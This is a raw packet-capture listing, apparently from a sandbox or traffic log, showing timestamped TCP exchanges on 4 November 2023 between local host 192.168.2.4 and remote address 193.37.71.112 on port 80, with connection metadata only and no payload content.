                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.000183105 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.000298023 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.000343084 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.157497883 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.157543898 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.157588959 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.157628059 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.157910109 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.157954931 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.159360886 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.159415960 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.159933090 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.159979105 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.160885096 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.160938978 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.161281109 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.161328077 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.162314892 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.162345886 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.162379980 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.162410021 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.162848949 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.162887096 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.162889957 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.162925005 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.163093090 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.163135052 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.163539886 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.163580894 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.163665056 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.163702011 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.163913012 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.163958073 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.165664911 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.165714979 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.167335033 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.167380095 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.167397976 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.167442083 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.167725086 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.167766094 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.168384075 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.168469906 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.172996044 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.173052073 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.174989939 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.175059080 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.176987886 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.177068949 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.179140091 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.179222107 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.181324005 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.181392908 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.181833982 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.181898117 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.184089899 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.184122086 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.184165001 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.184192896 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.185537100 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.185594082 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.187315941 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.187376976 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.189363956 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.189423084 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.191324949 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.191386938 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.193483114 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.193568945 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.222018003 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.222091913 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.222275019 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.222299099 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.222325087 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.222342968 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.378911972 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.379040956 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.379570961 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.379635096 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.380297899 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.380352974 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.381256104 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.381316900 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.381367922 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.381423950 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.382793903 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.382870913 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.382935047 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.382992029 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.383008957 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.383042097 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.383064985 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.383097887 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.383368969 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.383426905 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.383570910 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.383624077 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.384119034 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.384181976 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.384573936 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.384646893 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.384886026 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.384953022 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.385092974 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.385148048 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.385580063 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.385632038 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.387036085 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.387100935 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.387757063 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.387803078 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.387836933 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.387893915 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.388219118 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.388278008 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.388411999 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.388474941 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.389204025 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.389266968 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.389520884 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.389585972 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.390038967 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.390099049 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.390491009 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.390561104 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.390917063 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.390976906 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.390978098 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.391028881 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.391092062 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.391151905 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.391454935 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.391513109 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.393367052 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.393441916 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.393887043 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.393960953 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.398514032 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.398550034 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.398582935 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.398597002 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.398664951 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.399374008 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.399439096 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.401729107 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.401819944 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.402035952 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.402096987 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.402127981 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.402179956 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.404479027 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.404553890 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.405663013 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.405720949 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.405721903 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.405769110 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.407351971 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.407414913 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.407816887 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.407876015 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.409703970 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.409780025 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.409863949 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.409902096 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.411009073 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.411076069 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.413415909 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.413520098 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.413973093 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.414031982 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.442519903 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.442692995 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.443489075 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.443547964 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.599173069 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.599267960 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.599332094 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.599380016 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.599617958 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.599659920 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.600141048 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.600179911 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.600189924 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.600219011 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.600375891 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.600450039 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.601372957 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.601425886 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.608052969 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.608092070 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.608206034 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.608431101 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.608474970 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.608517885 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.608558893 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.608731031 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.608773947 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.609162092 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.609204054 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.609693050 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.609733105 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.609735012 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.609771967 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.609848976 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.609891891 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.610641003 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.610688925 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.610800982 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.610838890 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.610904932 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.611033916 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.611289978 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.611341000 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.615875006 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.615998030 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.618963003 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.618977070 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.619030952 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.619044065 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.619088888 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.619595051 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.619640112 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.622066975 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.622137070 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.622250080 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.622302055 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.622494936 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.622581005 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.624932051 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.625016928 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.628034115 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.628092051 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.628686905 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.628736973 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.628946066 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.628994942 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.630533934 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.630605936 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.630709887 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.630795956 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.631222010 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.631283045 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.634243011 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.634272099 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.634382963 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.662769079 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.662786961 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.663028955 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.663537979 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.663604021 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.663768053 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.663820982 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.820714951 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.820789099 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.820825100 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.820857048 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.820908070 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.821229935 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.821330070 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.821540117 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.821605921 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.821903944 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.821990967 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.828267097 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.829052925 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.829509020 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.829550028 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.829571962 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.829705954 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.831096888 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.831118107 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.831130028 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.831212044 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.831876993 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.832082033 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.832619905 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.832937956 CET8049731193.37.71.112192.168.2.4
